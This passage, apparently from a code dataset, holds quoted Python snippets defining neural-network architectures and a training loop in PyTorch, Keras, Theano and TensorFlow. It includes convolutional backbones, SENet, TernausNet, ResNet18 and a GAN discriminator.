inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n nn.Conv2d(64, 192, 3, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n nn.MaxPool2d(2,2),\n\n nn.Conv2d(192, 128, 1, padding=1), ## kernel size = 1 이므로 padding = 0(defalut)\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(128, 256, 3, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(256, 256, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(256, 512, 3, padding=1), \n nn.LeakyReLU(0.1, inplace=True),\n nn.MaxPool2d(2,2),\n\n nn.Conv2d(512, 256, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(256, 512, 3, padding=1), \n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(512, 256, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(256, 512, 3, padding=1), \n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(512, 256, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n nn.Conv2d(256, 512, 3, padding=1), \n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(512, 256, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n nn.Conv2d(256, 512, 3, padding=1), \n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(512, 512, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n nn.Conv2d(512, 1024, 3, padding=1), \n nn.LeakyReLU(0.1, inplace=True),\n nn.MaxPool2d(2,2),\n\n nn.Conv2d(1024, 512, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n nn.Conv2d(512, 1024, 3, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(1024, 512, 1, padding=1),\n nn.LeakyReLU(0.1, inplace=True),\n nn.Conv2d(512, 1024, 3, padding=1),\n nn.LeakyReLU(0.1, inplace=True)\n )\n return conv", "def train_conv_net(datasets,datasets_weights,\n U, U_Topical,\n img_w=300, \n filter_hs=[3,4,5],\n hidden_units=[100,2], \n dropout_rate=[0.5],\n shuffle_batch=True,\n n_epochs=25, \n batch_size=50, \n lr_decay = 0.95,\n conv_non_linear=\"relu\",\n use_valid_set=True,\n show_states=False,\n activations=[Iden],\n sqr_norm_lim=9,\n non_static=True): \n rng = np.random.RandomState(3435)\n img_h = len(datasets[0][0])-1 \n U_Topical.dtype = \"float32\"\n (num_topics,topic_dim) = U_Topical.shape\n word_w = img_w\n img_w = int(img_w + num_topics*topic_dim)\n filter_w = img_w \n feature_maps = hidden_units[0]\n filter_shapes = []\n pool_sizes = []\n for filter_h in filter_hs: \n filter_shapes.append((feature_maps, 1, filter_h, filter_w)) # 100 1 3 300\n pool_sizes.append((img_h-filter_h+1, img_w-filter_w+1)) # size of words samples one\n parameters = [(\"image shape\",img_h,img_w),(\"filter shape\",filter_shapes), (\"hidden_units\",hidden_units),\n (\"dropout\", dropout_rate), (\"batch_size\",batch_size),(\"non_static\", non_static),\n (\"learn_decay\",lr_decay), (\"conv_non_linear\", conv_non_linear), (\"non_static\", non_static)\n ,(\"sqr_norm_lim\",sqr_norm_lim),(\"shuffle_batch\",shuffle_batch)]\n #print parameters \n \n #define model architecture\n index = T.lscalar()\n x = T.matrix('x') \n y = T.ivector('y')\n x_topic = T.tensor3('x_topic')\n Words = theano.shared(value = U, name = \"Words\")\n Topics = theano.shared(value=U_Topical,name=\"Topics\")\n zero_vec_tensor = T.vector()\n zero_vec = np.zeros(word_w, dtype='float32')\n set_zero = theano.function([zero_vec_tensor], updates=[(Words, T.set_subtensor(Words[0,:], zero_vec_tensor))])\n layer0_input_words = Words[T.cast(x.flatten(),dtype=\"int32\")].reshape((x.shape[0],1,x.shape[1],Words.shape[1])) \n layer0_inputs_topics = []\n for i in range(num_topics):\n sin_topic = x_topic[:,:,i]\n Topic = Topics[i].reshape((1,Topics[i].shape[0]))\n weights = sin_topic.flatten()\n weights = weights.reshape((weights.shape[0],1))\n layer0_inputs_topics.append(T.dot(weights, Topic))\n layer0_input_topics = T.concatenate(layer0_inputs_topics,1)\n layer0_input_topics = layer0_input_topics.reshape((x_topic.shape[0],1,x_topic.shape[1],num_topics*topic_dim))\n layer0_input = T.concatenate([layer0_input_words,layer0_input_topics],3) \n conv_layers = []\n layer1_inputs = []\n for i in xrange(len(filter_hs)):\n filter_shape = filter_shapes[i]\n pool_size = pool_sizes[i]\n conv_layer = LeNetConvPoolLayer(rng, input=layer0_input,image_shape=(batch_size, 1, img_h, img_w),\n filter_shape=filter_shape, poolsize=pool_size, non_linear=conv_non_linear)\n layer1_input = conv_layer.output.flatten(2)\n conv_layers.append(conv_layer)\n layer1_inputs.append(layer1_input)\n layer1_input = T.concatenate(layer1_inputs,1)\n hidden_units[0] = feature_maps*len(filter_hs) \n classifier = MLPDropout(rng, input=layer1_input, layer_sizes=hidden_units, activations=activations, dropout_rates=dropout_rate)\n \n #define parameters of the model and update functions using adadelta\n params = classifier.params \n for conv_layer in conv_layers:\n params += conv_layer.params\n \n if non_static:\n #if word vectors are allowed to change, add them as model parameters\n params += [Words] #params are model parameters\n params += [Topics] #Topics embedding are adjusted\n cost = classifier.negative_log_likelihood(y) \n dropout_cost = classifier.dropout_negative_log_likelihood(y) \n grad_updates = sgd_updates_adadelta(params, dropout_cost, lr_decay, 1e-6, sqr_norm_lim)\n \n #shuffle dataset and assign to mini batches. if dataset size is not a multiple of mini batches, replicate \n #extra data (at random)\n np.random.seed(3435)\n if datasets[0].shape[0] % batch_size > 0:\n extra_data_num = batch_size - datasets[0].shape[0] % batch_size\n random_index = np.random.permutation(np.arange(datasets[0].shape[0])) \n random_index.astype('int32')\n train_set = datasets[0][random_index,:]\n train_set_weights = datasets_weights[0][random_index,:,:]\n extra_data = train_set[:extra_data_num]\n extra_data_weights = train_set_weights[:extra_data_num]\n new_data=np.append(datasets[0],extra_data,axis=0)\n new_data_weights = np.append(datasets_weights[0],extra_data_weights,axis = 0)\n else:\n new_data = datasets[0]\n new_data_weights = datasets_weights[0]\n random_index = np.random.permutation(np.arange(new_data.shape[0])) \n random_index.astype('int32')\n new_data = new_data[random_index]\n new_data_weights = new_data_weights[random_index]\n n_batches = new_data.shape[0]/batch_size\n n_train_batches = int(np.round(n_batches*0.9))\n \n test_set_x = np.asarray(datasets[1][:,:img_h] ,\"float32\")\n test_set_x_topic = np.asarray(datasets_weights[1][:,:img_h,:] ,\"float32\")\n test_set_y = np.asarray(datasets[1][:,-1],\"int32\")\n if use_valid_set:\n train_set = new_data[:n_train_batches*batch_size,:]\n train_set_weights = new_data_weights[:n_train_batches*batch_size,:,:]\n val_set = new_data[n_train_batches*batch_size:,:]\n val_set_weights = new_data_weights[n_train_batches*batch_size:,:,:] \n train_set_x, train_set_x_topic, train_set_y = shared_dataset((train_set[:,:img_h],train_set_weights,train_set[:,-1]))\n val_set_x, val_set_x_topic, val_set_y = shared_dataset((val_set[:,:img_h],val_set_weights,val_set[:,-1]))\n n_val_batches = n_batches - n_train_batches\n val_model = theano.function([index], classifier.errors(y),\n givens={\n x: val_set_x[index * batch_size: (index + 1) * batch_size],\n x_topic: val_set_x_topic[index * batch_size: (index + 1) * batch_size],\n y: val_set_y[index * batch_size: (index + 1) * batch_size]})\n else:\n train_set = new_data[:,:] \n train_set_x, train_set_x_topic, train_set_y = shared_dataset((train_set[:,:img_h],train_set_weights,train_set[:,-1])) \n \n #make theano functions to get train/val/test errors\n test_model = theano.function([index], classifier.errors(y),\n givens={\n x: train_set_x[index * batch_size: (index + 1) * batch_size],\n x_topic: train_set_x_topic[index * batch_size: (index + 1) * batch_size],\n y: train_set_y[index * batch_size: (index + 1) * batch_size]}) \n train_model = theano.function([index], cost, updates=grad_updates,\n givens={\n x: train_set_x[index*batch_size:(index+1)*batch_size],\n x_topic: train_set_x_topic[index * batch_size: (index + 1) * batch_size],\n y: train_set_y[index*batch_size:(index+1)*batch_size]}) \n test_pred_layers = []\n test_size = test_set_x.shape[0]\n \n \n\n test_layer0_input_words = Words[T.cast(x.flatten(),dtype=\"int32\")].reshape((test_size,1,img_h,Words.shape[1])) \n test_layer0_inputs_topics = []\n for i in range(num_topics):\n sin_topic = x_topic[:,:,i]\n Topic = Topics[i].reshape((1,Topics[i].shape[0]))\n weights = sin_topic.flatten()\n weights = weights.reshape((weights.shape[0],1))\n test_layer0_inputs_topics.append(T.dot(weights, Topic))\n test_layer0_input_topics = T.concatenate(test_layer0_inputs_topics,1)\n test_layer0_input_topics = test_layer0_input_topics.reshape((test_size,1,img_h,num_topics*topic_dim))\n test_layer0_input = T.concatenate([test_layer0_input_words,test_layer0_input_topics],3) \n\n\n\n for conv_layer in conv_layers:\n test_layer0_output = conv_layer.predict(test_layer0_input, test_size)\n test_pred_layers.append(test_layer0_output.flatten(2))\n test_layer1_input = T.concatenate(test_pred_layers, 1)\n test_y_pred = classifier.predict(test_layer1_input)\n\n test_error = T.mean(T.neq(test_y_pred, y))\n test_model_all = theano.function([x,x_topic,y], test_error) \n \n #start training over mini-batches\n print '... training'\n epoch = 0\n best_val_perf = 0\n val_perf = 0\n test_perf = 0 \n cost_epoch = 0 \n while (epoch < n_epochs): \n epoch = epoch + 1\n if shuffle_batch:\n for minibatch_index in np.random.permutation(range(n_train_batches)):\n cost_epoch = train_model(minibatch_index)\n set_zero(zero_vec)\n else:\n for minibatch_index in xrange(n_train_batches):\n cost_epoch = train_model(minibatch_index) \n set_zero(zero_vec)\n train_losses = [test_model(i) for i in xrange(n_train_batches)]\n train_perf = 1 - np.mean(train_losses)\n if use_valid_set:\n val_losses = [val_model(i) for i in xrange(n_val_batches)]\n val_perf = 1- np.mean(val_losses)\n\n if val_perf >= best_val_perf:\n params_conv = [] \n params_output = {}\n test_loss = test_model_all(test_set_x,test_set_x_topic, test_set_y) \n test_perf = 1- test_loss \n best_val_perf = val_perf \n for conv_layer in conv_layers:\n params_conv.append(conv_layer.get_params())\n params_output = classifier.get_params()\n word_vec = Words.get_value()\n Topic_vec = Topics.get_value()\n else :\n val_perf = 0 \n if show_states:\n print('epoch %i, train perf %f %%, val perf %f' % (epoch, train_perf * 100., val_perf*100.))\n \n if not use_valid_set:\n params_conv = [] \n params_output = {}\n test_loss = test_model_all(test_set_x,test_set_x_topic, test_set_y) \n test_perf = 1- test_loss \n \n for conv_layer in conv_layers:\n params_conv.append(conv_layer.get_params())\n params_output = classifier.get_params()\n word_vec = Words.get_value()\n Topic_vec = Topics.get_value() \n \n return test_perf, [params_conv, params_output, word_vec,Topic_vec]", "def setUp(self):\n # The short NSC used in this example\n self.net_nsc = [\n (1, 4, 0, 0, 0), # Layer 1: Identity(input)\n (2, 1, 3, 1, 0), # Layer 2: Convolution(Layer1)\n (3, 1, 3, 2, 0), # Layer 3: Convolution(Layer2)\n (4, 5, 0, 1, 3), # Layer 4: Convolution(Layer1)\n (5, 7, 0, 0, 0), # Layer 5: Convolution(Layer4)\n ]", "def forward(self, Xo):\n N = Xo.size()[0]\n # assert Xo.size() == (N, 3, 448, 448)\n X = self.features(Xo)\n # assert X.size() == (N, 128, 112, 112)\n Xp = nn.MaxPool2d(kernel_size=4, stride=4)(X)\n # Xp = F.adaptive_avg_pool2d(X, (1, 1))\n # assert Xp.size() == (N, 128, 28, 28)\n Xp = Xp.view(-1, 128*28*28 )\n # 3 way, get attention mask\n X1 = self.fc1(Xp)\n X2 = self.fc2(Xp)\n X3 = self.fc3(Xp)\n # X1 = F.relu(self.fc1_(Xp))\n # X2 = F.relu(self.fc2_(Xp))\n # X3 = F.relu(self.fc3_(Xp))\n # X1 = self.fc1(X1)\n # X2 = self.fc2(X2)\n # X3 = self.fc3(X3)\n # multiple mask elementwisely, get 3 attention part\n X1 = X1.unsqueeze(dim=2).unsqueeze(dim=3) * X\n X2 = X2.unsqueeze(dim=2).unsqueeze(dim=3) * X\n X3 = X3.unsqueeze(dim=2).unsqueeze(dim=3) * X\n #get the graduate w.r.t input image and multiple, then X1 become N*3*448*448\n X1=self.weightByGrad(X1,Xo)\n X2=self.weightByGrad(X2,Xo)\n X3=self.weightByGrad(X3,Xo)\n # use stn to crop, size become (N,3,96,96)\n # X1 = self.stn(X1, 0)\n # X2 = self.stn(X2, 1)\n # X3 = self.stn(X3, 2)\n #3 BCNN 3 size==(N,200)\n X1=self.BCNN_N(X1,self.bcnnConv_1,self.bfc1)\n X2=self.BCNN_N(X2,self.bcnnConv_2,self.bfc2)\n X3=self.BCNN_N(X3,self.bcnnConv_3,self.bfc3)\n #sum them up, for the predict max\n res=X1+X2+X3\n\n return res", "def __init__(self, block, layers, groups, reduction, dropout_p=0.2, in_channels=3,\n inplanes=128, input_3x3=True, downsample_kernel_size=3,\n downsample_padding=1, num_classes=1000):\n super(SENet, self).__init__()\n \n self.in_channels = in_channels\n self.inplanes = inplanes\n\n if input_3x3:\n layer0_modules = [\n ('conv1', nn.Conv2d(in_channels, 64, 3, stride=2, padding=1,\n bias=False)),\n ('bn1', nn.BatchNorm2d(64)),\n ('relu1', nn.ReLU(inplace=True)),\n ('conv2', nn.Conv2d(64, 64, 3, stride=1, padding=1,\n bias=False)),\n ('bn2', nn.BatchNorm2d(64)),\n ('relu2', nn.ReLU(inplace=True)),\n ('conv3', nn.Conv2d(64, inplanes, 3, stride=1, padding=1,\n bias=False)),\n ('bn3', nn.BatchNorm2d(inplanes)),\n ('relu3', nn.ReLU(inplace=True)),\n ]\n else:\n layer0_modules = [\n ('conv1', nn.Conv2d(in_channels, inplanes, kernel_size=7, stride=2,\n padding=3, bias=False)),\n ('bn1', nn.BatchNorm2d(inplanes)),\n ('relu1', nn.ReLU(inplace=True)),\n ]\n\n layer0_modules.append(('pool', nn.MaxPool2d(3, stride=2, ceil_mode=True)))\n \n self.layer0 = nn.Sequential(OrderedDict(layer0_modules))\n \n self.layer1 = self._make_layer(\n block,\n planes=64,\n blocks=layers[0],\n groups=groups,\n reduction=reduction,\n downsample_kernel_size=1,\n downsample_padding=0\n )\n \n self.layer2 = self._make_layer(\n block,\n planes=128,\n blocks=layers[1],\n stride=2,\n groups=groups,\n reduction=reduction,\n downsample_kernel_size=downsample_kernel_size,\n downsample_padding=downsample_padding\n )\n \n self.layer3 = self._make_layer(\n block,\n planes=256,\n blocks=layers[2],\n stride=2,\n groups=groups,\n reduction=reduction,\n downsample_kernel_size=downsample_kernel_size,\n downsample_padding=downsample_padding\n )\n \n self.layer4 = self._make_layer(\n block,\n planes=512,\n blocks=layers[3],\n stride=2,\n groups=groups,\n reduction=reduction,\n downsample_kernel_size=downsample_kernel_size,\n downsample_padding=downsample_padding\n )\n \n self.avg_pool = nn.AvgPool2d(7, stride=1)\n self.dropout = nn.Dropout2d(dropout_p) if dropout_p is not None else None\n self.last_linear = nn.Linear(512 * block.expansion, num_classes)", "def ternausnetv1(input_shape=(512, 512, 3), base_depth=64):\n inputs = Input(input_shape)\n conv1 = Conv2D(base_depth, 3, activation='relu', padding='same')(inputs)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n\n conv2_1 = Conv2D(base_depth*2, 3, activation='relu',\n padding='same')(pool1)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2_1)\n\n conv3_1 = Conv2D(base_depth*4, 3, activation='relu',\n padding='same')(pool2)\n conv3_2 = Conv2D(base_depth*4, 3, activation='relu',\n padding='same')(conv3_1)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3_2)\n\n conv4_1 = Conv2D(base_depth*8, 3, activation='relu',\n padding='same')(pool3)\n conv4_2 = Conv2D(base_depth*8, 3, activation='relu',\n padding='same')(conv4_1)\n pool4 = MaxPooling2D(pool_size=(2, 2))(conv4_2)\n\n conv5_1 = Conv2D(base_depth*8, 3, activation='relu',\n padding='same')(pool4)\n conv5_2 = Conv2D(base_depth*8, 3, activation='relu',\n padding='same')(conv5_1)\n pool5 = MaxPooling2D(pool_size=(2, 2))(conv5_2)\n\n conv6_1 = Conv2D(base_depth*8, 3, activation='relu',\n padding='same')(pool5)\n\n up7 = Conv2DTranspose(base_depth*4, 2, strides=(2, 2), activation='relu',\n padding='same')(conv6_1)\n concat7 = concatenate([up7, conv5_2])\n conv7_1 = Conv2D(base_depth*8, 3, activation='relu',\n padding='same')(concat7)\n\n up8 = Conv2DTranspose(base_depth*4, 2, strides=(2, 2), activation='relu',\n padding='same')(conv7_1)\n concat8 = concatenate([up8, conv4_2])\n conv8_1 = Conv2D(base_depth*8, 3, activation='relu',\n padding='same')(concat8)\n\n up9 = Conv2DTranspose(base_depth*2, 2, strides=(2, 2), activation='relu',\n padding='same')(conv8_1)\n concat9 = concatenate([up9, conv3_2])\n conv9_1 = Conv2D(base_depth*4, 3, activation='relu',\n padding='same')(concat9)\n\n up10 = Conv2DTranspose(base_depth, 2, strides=(2, 2), activation='relu',\n padding='same')(conv9_1)\n concat10 = concatenate([up10, conv2_1])\n conv10_1 = Conv2D(base_depth*2, 3, activation='relu',\n padding='same')(concat10)\n\n up11 = Conv2DTranspose(int(base_depth/2), 2, strides=(2, 2),\n activation='relu', padding='same')(conv10_1)\n concat11 = concatenate([up11, conv1])\n\n out = Conv2D(1, 1, activation='sigmoid', padding='same')(concat11)\n\n return Model(input=inputs, output=out)", "def build_network(self):\n\n input_placeholder = Input(shape = self.input_shape)\n\n # Stage 1\n x = self.main_path_block(\n input_placeholder,\n 64, (7, 7), 'same',\n 'conv1', 'bn_conv1',\n activation = 'relu',\n strides = (2, 2)\n )\n x = MaxPooling2D((3, 3), strides = (2, 2), padding = 'same')(x)\n\n # Stage 2\n x = self.identity_block(x, 64, 'relu', 2, 'a', False)\n x = self.identity_block(x, 64, 'relu', 2, 'b')\n\n # Stage 3\n x = self.convolutional_block(x, [128, 128, 128], 'relu', 3, 'a')\n x = self.identity_block(x, 128, 'relu', 3, 'b')\n\n # Stage 4\n x = self.convolutional_block(x, [256, 256, 256], 'relu', 4, 'a')\n x = self.identity_block(x, 256, 'relu', 4, 'b')\n\n # Stage 5\n x = self.convolutional_block(x, [512, 512, 512], 'relu', 5, 'a')\n x = self.identity_block(x, 512, 'relu', 4, 'b')\n\n # Fully Connected Layers\n x = BatchNormalization(axis = 3)(x)\n x = Activation('relu')(x)\n x = AveragePooling2D((2, 1), padding = 'valid', strides = (2, 2))(x)\n x = Flatten()(x)\n x = Dense(512)\n x = Dense(\n self.classes, activation = 'softmax',\n name = 'fc_' + str(self.classes),\n kernel_initializer = glorot_uniform(seed = 0)\n )(x)\n\n self.model = Model(input_placeholder, x, name = 'Resnet18')", "def _model_definition(self, net):\n \n # Input filtering and downsampling with max pooling\n print(net.shape) #channels must be specified first otherwise keras assumes channels last\n print('resnet17_scp')\n \n net = Conv2D( filters=128, kernel_size=5, activation=None, padding='same', \n data_format=\"channels_first\", input_shape=(1, 100, 100))(net)\n net = BatchNormalization(axis=1)(net) #axis is set to the dimension which hold the colour channels\n net = LeakyReLU()(net)\n net= MaxPooling2D(pool_size=(2,2))(net)\n \n net = Conv2D( filters=64, kernel_size=3, activation=None, padding='same', data_format=\"channels_first\")(net)\n net = BatchNormalization(axis=1)(net) #axis is set to the dimension which hold the colour channels\n net = LeakyReLU()(net)\n net= MaxPooling2D(pool_size=(2,2))(net)\n \n net = Conv2D( filters=64, kernel_size=3,activation=None, padding='same', data_format=\"channels_first\")(net)\n net = BatchNormalization(axis=1)(net) #axis is set to the dimension which hold the colour channels \n net = LeakyReLU()(net)\n net= MaxPooling2D(pool_size=(2,2))(net)\n \n\n\n \n return net", "def __init__(self):\n super(FcNet, self).__init__()\n\n # get size of some layers\n start_num = 48\n max_num = 200\n mid_num = 50\n end_num = 8\n \n # define regressor\n self.regress = nn.Sequential(\n nn.Linear(start_num,max_num,bias=True),\n nn.Sigmoid(),\n nn.Linear(max_num,mid_num,bias = True),\n nn.Sigmoid(),\n nn.Linear(mid_num,end_num, bias = True),\n nn.Sigmoid()\n )", "def __init__(self, id, node_type=NodeType.HIDDEN, activation=F.relu, layer_type=nn.Conv2d,\n conv_window_size=3, conv_stride=1, max_pool_size=2):\n\n super(ModuleNEATNode, self).__init__(id, node_type)\n\n batch_norm_chance = 0.65 # chance that a new node will start with batch norm\n use_batch_norm = random.random() < batch_norm_chance\n\n dropout_chance = 0.2 # chance that a new node will start with drop out\n use_dropout = random.random() < dropout_chance\n\n max_pool_chance = 0.3 # chance that a new node will start with drop out\n use_max_pool = random.random() < max_pool_chance\n\n self.activation = Mutagen(F.relu, F.leaky_relu, torch.sigmoid, F.relu6,\n discreet_value=activation, name=\"activation function\",\n mutation_chance=0.15) # TODO try add in Selu, Elu\n\n conv_out_features = 25 + random.randint(0, 25)\n linear_out_features = 100 + random.randint(0, 100)\n\n linear_submutagens = \\\n {\n \"regularisation\": Mutagen(None, nn.BatchNorm1d,\n discreet_value=nn.BatchNorm1d if use_batch_norm else None,\n mutation_chance=0.15),\n\n \"dropout\": Mutagen(None, nn.Dropout, discreet_value=nn.Dropout if use_dropout else None, sub_mutagens=\n {\n nn.Dropout: {\n \"dropout_factor\": Mutagen(value_type=ValueType.CONTINUOUS, current_value=0.15, start_range=0,\n end_range=0.75)}\n }, mutation_chance=0.08),\n\n \"out_features\": Mutagen(value_type=ValueType.WHOLE_NUMBERS, current_value=linear_out_features,\n start_range=10,\n end_range=1024, name=\"num out features\", mutation_chance=0.22,\n distance_weighting=Props.LAYER_SIZE_COEFFICIENT if Config.allow_attribute_distance else 0)\n }\n\n conv_submutagens = {\n \"conv_window_size\": Mutagen(3, 5, 7, discreet_value=conv_window_size, mutation_chance=0.13),\n\n \"conv_stride\": Mutagen(value_type=ValueType.WHOLE_NUMBERS, current_value=conv_stride, start_range=1,\n end_range=5),\n\n \"reduction\": Mutagen(None, nn.MaxPool2d, discreet_value=nn.MaxPool2d if use_max_pool else None,\n sub_mutagens=\n {\n nn.MaxPool2d: {\"pool_size\": Mutagen(\n value_type=ValueType.WHOLE_NUMBERS, current_value=max_pool_size, start_range=2,\n end_range=5)}\n }, mutation_chance=0.15),\n\n \"regularisation\": Mutagen(None, nn.BatchNorm2d, discreet_value=nn.BatchNorm2d if use_batch_norm else None,\n mutation_chance=0.15),\n\n \"dropout\": Mutagen(None, nn.Dropout2d, discreet_value=nn.Dropout2d if use_dropout else None, sub_mutagens=\n {\n nn.Dropout2d: {\n \"dropout_factor\": Mutagen(value_type=ValueType.CONTINUOUS, current_value=0.1,\n start_range=0, end_range=0.75)}\n }, mutation_chance=0.08),\n\n \"out_features\": Mutagen(value_type=ValueType.WHOLE_NUMBERS, current_value=conv_out_features, start_range=1,\n end_range=100, name=\"num out features\", mutation_chance=0.22,\n distance_weighting=Props.LAYER_SIZE_COEFFICIENT if Config.allow_attribute_distance else 0)\n }\n\n if use_linears and not use_convs:\n self.layer_type = Mutagen(nn.Linear, discreet_value=nn.Linear,\n distance_weighting=Props.LAYER_TYPE_COEFFICIENT if Config.allow_attribute_distance else 0,\n sub_mutagens={nn.Linear: linear_submutagens}\n )\n if use_convs and not use_linears:\n self.layer_type = Mutagen(nn.Conv2d, discreet_value=nn.Conv2d,\n distance_weighting=Props.LAYER_TYPE_COEFFICIENT if Config.allow_attribute_distance else 0,\n sub_mutagens={nn.Conv2d: conv_submutagens})\n if use_convs and use_linears:\n self.layer_type = Mutagen(nn.Conv2d, nn.Linear, discreet_value=layer_type,\n distance_weighting=Props.LAYER_TYPE_COEFFICIENT if Config.allow_attribute_distance else 0,\n sub_mutagens={\n nn.Conv2d: conv_submutagens,\n nn.Linear: linear_submutagens\n }, name=\"deep layer type\", mutation_chance=0.08)", "def _init_layers(self):\n self.relu = nn.ReLU(inplace=True)\n self.cls_convs = nn.ModuleList()\n self.reg_convs = nn.ModuleList()\n for i in range(self.stacked_convs):\n chn = self.in_channels if i == 0 else self.feat_channels\n self.cls_convs.append(\n ConvModule(\n chn,\n self.feat_channels,\n 3,\n stride=1,\n padding=1,\n conv_cfg=dict(type='DCN', deform_groups=1)\n if i == 0 and self.use_dcn else self.conv_cfg,\n norm_cfg=self.norm_cfg))\n self.reg_convs.append(\n ConvModule(\n chn,\n self.feat_channels,\n 3,\n stride=1,\n padding=1,\n conv_cfg=dict(type='DCN', deform_groups=1)\n if i == 0 and self.use_dcn else self.conv_cfg,\n norm_cfg=self.norm_cfg))\n self.atss_cls = nn.Conv2d(\n self.feat_channels,\n self.num_base_priors * self.cls_out_channels,\n 3,\n padding=1)\n self.atss_reg = nn.Conv2d(\n self.feat_channels, self.num_base_priors * 4, 3, padding=1)\n self.atss_iou = nn.Conv2d(\n self.feat_channels, self.num_base_priors * 1, 3, padding=1)\n self.scales = nn.ModuleList(\n [Scale(1.0) for _ in self.prior_generator.strides])\n\n # we use the global list in loss\n self.cls_num_pos_samples_per_level = [\n 0. for _ in range(len(self.prior_generator.strides))\n ]\n self.reg_num_pos_samples_per_level = [\n 0. for _ in range(len(self.prior_generator.strides))\n ]", "def trainNet():", "def arch(self, nn) -> 'final node of the tensor flow graph (y_conv)':\n\n print(self)\n\n # first conv. layer \n # 5x5 filter, 1 input channel, 32 output channels\n W_conv1 = nn.weight_variable([5, 5, 1, 32])\n b_conv1 = nn.bias_variable([32])\n stride1 = 1\n h_conv1 = tf.nn.relu(nn.conv2d(nn.x_image, W_conv1, stride1, 'VALID') + b_conv1) \n # outputs a 24x24x32 image\n \n # first pooling layer (2x2) \n h_pool1 = nn.max_pool_2x2(h_conv1) \n # outputs a 12x12x32 image\n\n # second conv. layer \n # 3x3 filter, 32 input channel, 32 output channels\n W_conv2 = nn.weight_variable([3, 3, 32, 32])\n b_conv2 = nn.bias_variable([32])\n stride2 = 1\n h_conv2 = tf.nn.relu(nn.conv2d(h_pool1, W_conv2, stride2, 'VALID') + b_conv2)\n # outputs a 10x10x32 image\n\n # third conv. layer\n # 3x3 filter, 32 input channel, 32 output channels\n W_conv3 = nn.weight_variable([3, 3, 32, 32])\n b_conv3 = nn.bias_variable([32])\n stride3 = 1\n h_conv3 = tf.nn.relu(nn.conv2d(h_conv2, W_conv3, stride3, 'VALID') + b_conv3)\n # outputs a 8x8x32 image\n\n # reshape (flatten) output\n h_conv3_flat = tf.reshape(h_conv3, [-1, 8*8*32])\n\n # first fully connected layer\n W_fc1 = nn.weight_variable([8 * 8 * 32, 1024])\n b_fc1 = nn.bias_variable([1024])\n h_fc1 = tf.nn.relu(tf.matmul(h_conv3_flat, W_fc1) + b_fc1)\n\n # dropout\n h_fc1_drop = tf.nn.dropout(h_fc1, nn.keep_prob)\n\n # second (final) fully connected layer (softmax)\n W_fc2 = nn.weight_variable([1024, 10])\n b_fc2 = nn.bias_variable([10])\n y_conv=tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\n return y_conv", "def __init__(self):\n super().__init__()\n \n # convolutional layers\n self.conv1 = nn.Conv2d(1, 16, kernel_size=3) # 16x(14-2)x(14-2) = 16x12x12\n self.conv2 = nn.Conv2d(16, 32, kernel_size=3) # 32x10x10 => pooling = 32x5x5\n \n # fully connected layers\n self.fc1 = nn.Linear(32 * 5 * 5, 64)\n self.fc2 = nn.Linear(64, 10)\n self.fc3 = nn.Linear(20, 10)\n self.fc4 = nn.Linear(10, 1)\n \n # regularizers\n self.drop = nn.Dropout(0.1)\n self.drop2d = nn.Dropout2d(0.1)\n self.pool = nn.MaxPool2d(kernel_size=2)\n self.bn2d = nn.BatchNorm2d(16, affine=False)\n self.bn = nn.BatchNorm1d(64, affine=False)\n\n # activation functions\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n \n # Initialize weights\n self.apply(self.weights_init)", "def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d):\n super(FCNDiscriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n\n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n # sequence += [\n # nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n # norm_layer(ndf * nf_mult),\n # nn.LeakyReLU(0.2, True)\n # ]\n self.model = nn.Sequential(*sequence)\n # sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n self.fcn = nn.Sequential(nn.ConvTranspose2d(ndf*nf_mult, 1, kernel_size=32, stride=32, padding=0),\n nn.Sigmoid()\n )\n self.downConv = nn.Sequential(\n nn.Conv2d(ndf * nf_mult, ndf * nf_mult, kernel_size=4, stride=2, padding=1, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True),\n nn.Conv2d(ndf * nf_mult, ndf * nf_mult, kernel_size=4, stride=1, padding=0, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True),\n nn.Conv2d(ndf * nf_mult, 1, kernel_size=3, stride=1, padding=padw)\n )", "def __init__(self, input_nc, ndf=64, n_layers=3, 